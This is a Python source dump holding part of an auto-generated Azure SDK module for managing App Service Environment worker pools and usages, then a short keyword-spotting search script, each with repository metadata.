if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._suspend_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
            cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
def internal_get_next(next_link=None):
if next_link is None:
return pipeline_response
return get_next(next_link)
return ItemPaged(
internal_get_next, extract_data
)
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_suspend.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend"} # type: ignore
@distributed_trace
def list_usages(
self,
resource_group_name: str,
name: str,
filter: Optional[str] = None,
**kwargs: Any
) -> Iterable[_models.CsmUsageQuotaCollection]:
"""Get global usage metrics of an App Service Environment.
Get global usage metrics of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param filter: Return only usages/metrics specified in the filter. Filter conforms to odata
syntax. Example: $filter=(name.value eq 'Metric1' or name.value eq 'Metric2') and startTime eq
2014-01-01T00:00:00Z and endTime eq 2014-12-31T23:59:59Z and timeGrain eq
duration'[Hour|Minute|Day]'. Default value is None.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CsmUsageQuotaCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.CsmUsageQuotaCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.CsmUsageQuotaCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
filter=filter,
template_url=self.list_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_usages_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
filter=filter,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmUsageQuotaCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages"} # type: ignore
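    # A hedged usage sketch (not part of the generated code): assuming a
    # WebSiteManagementClient named `client` has been built elsewhere, the
    # returned ItemPaged can be iterated directly; resource names below are
    # placeholders.
    #
    #   for quota in client.app_service_environments.list_usages(
    #       resource_group_name="my-rg",
    #       name="my-ase",
    #       filter="name.value eq 'Metric1'",
    #   ):
    #       print(quota.name.value, quota.current_value, quota.limit)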
@distributed_trace
def list_worker_pools(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.WorkerPoolCollection]:
"""Get all worker pools of an App Service Environment.
Get all worker pools of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WorkerPoolCollection or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.WorkerPoolCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pools.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pools_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("WorkerPoolCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pools.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools"} # type: ignore
@distributed_trace
def get_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Get properties of a worker pool.
Get properties of a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
request = build_get_worker_pool_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_worker_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
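    # A hedged usage sketch (placeholders, not shipped sample code): fetching a
    # single pool with the same hypothetical `client` as above.
    #
    #   pool = client.app_service_environments.get_worker_pool(
    #       resource_group_name="my-rg", name="my-ase", worker_pool_name="0")
    #   print(pool.worker_size, pool.worker_count)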
def _create_or_update_worker_pool_initial(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(worker_pool_envelope, 'WorkerPoolResource')
request = build_create_or_update_worker_pool_request_initial(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_worker_pool_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_worker_pool_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
@distributed_trace
def begin_create_or_update_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> LROPoller[_models.WorkerPoolResource]:
"""Create or update a worker pool.
Create or update a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param worker_pool_envelope: Properties of the worker pool.
:type worker_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either WorkerPoolResource or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_worker_pool_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
worker_pool_envelope=worker_pool_envelope,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
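    # A hedged usage sketch for the long-running operation above (placeholders,
    # not shipped sample code): begin_* returns an LROPoller, and result()
    # blocks until the service reaches a terminal state.
    #
    #   from azure.mgmt.web.v2019_08_01.models import WorkerPoolResource
    #   poller = client.app_service_environments.begin_create_or_update_worker_pool(
    #       resource_group_name="my-rg",
    #       name="my-ase",
    #       worker_pool_name="1",
    #       worker_pool_envelope=WorkerPoolResource(worker_size="Small", worker_count=2),
    #   )
    #   pool = poller.result()  # deserialized WorkerPoolResource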
@distributed_trace
def update_worker_pool(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
worker_pool_envelope: _models.WorkerPoolResource,
**kwargs: Any
) -> _models.WorkerPoolResource:
"""Create or update a worker pool.
Create or update a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param worker_pool_envelope: Properties of the worker pool.
:type worker_pool_envelope: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WorkerPoolResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.WorkerPoolResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.WorkerPoolResource]
_json = self._serialize.body(worker_pool_envelope, 'WorkerPoolResource')
request = build_update_worker_pool_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update_worker_pool.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('WorkerPoolResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_worker_pool.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}"} # type: ignore
@distributed_trace
def list_worker_pool_instance_metric_definitions(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
instance: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a specific instance of a worker pool of an App Service Environment.
Get metric definitions for a specific instance of a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:param instance: Name of the instance in the worker pool.
:type instance: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pool_instance_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pool_instance_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
instance=instance,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pool_instance_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions"} # type: ignore
@distributed_trace
def list_web_worker_metric_definitions(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.ResourceMetricDefinitionCollection]:
"""Get metric definitions for a worker pool of an App Service Environment.
Get metric definitions for a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ResourceMetricDefinitionCollection or the result
of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.ResourceMetricDefinitionCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.ResourceMetricDefinitionCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_worker_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_web_worker_metric_definitions.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_worker_metric_definitions_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ResourceMetricDefinitionCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_worker_metric_definitions.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions"} # type: ignore
@distributed_trace
def list_worker_pool_skus(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.SkuInfoCollection]:
"""Get available SKUs for scaling a worker pool.
Get available SKUs for scaling a worker pool.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SkuInfoCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.SkuInfoCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.SkuInfoCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_worker_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_worker_pool_skus.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_worker_pool_skus_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SkuInfoCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_worker_pool_skus.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus"} # type: ignore
@distributed_trace
def list_web_worker_usages(
self,
resource_group_name: str,
name: str,
worker_pool_name: str,
**kwargs: Any
) -> Iterable[_models.UsageCollection]:
"""Get usage metrics for a worker pool of an App Service Environment.
Get usage metrics for a worker pool of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param worker_pool_name: Name of the worker pool.
:type worker_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either UsageCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.UsageCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.UsageCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_web_worker_usages_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_web_worker_usages.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_web_worker_usages_request(
resource_group_name=resource_group_name,
name=name,
worker_pool_name=worker_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("UsageCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_web_worker_usages.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages"} # type: ignore
| {
"content_hash": "d02a162098329796829b34f29ca5e8a9",
"timestamp": "",
"source": "github",
"line_count": 5108,
"max_line_length": 272,
"avg_line_length": 42.743931088488644,
"alnum_prop": 0.6155558405393522,
"repo_name": "Azure/azure-sdk-for-python",
"id": "09fd2862d36580800acb46403729037ad4ba2c78",
"size": "218836",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2019_08_01/operations/_app_service_environments_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import numpy as np
from search.kws import KWS
from ip import doc_processor
from search import plot_accuracy
# Process the images and generate a feature map
doc_processor.main()
# Process the logs, generate the plots, and print results to stdout
plot_accuracy.main()
# Load training and validation data
kws = KWS()
kws.load_train_and_valid()
# Get one single page from the validation data
index = np.array([x.doc_id in ['300'] for x in kws.valid.coords], dtype=bool)
dataset = kws.valid.subset(index)
# Search
kws.set_data(dataset)
kws.create_index()
kws.search_word('with')
| {
"content_hash": "18ba152b51b07fa96e486577215208b7",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 85,
"avg_line_length": 22.64,
"alnum_prop": 0.7438162544169611,
"repo_name": "dwettstein/pattern-recognition-2016",
"id": "b1d986433fafacc67d2388aa31216cf9ec09b16f",
"size": "566",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kws_pipeline.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5448"
},
{
"name": "CSS",
"bytes": "1253"
},
{
"name": "JavaScript",
"bytes": "5235"
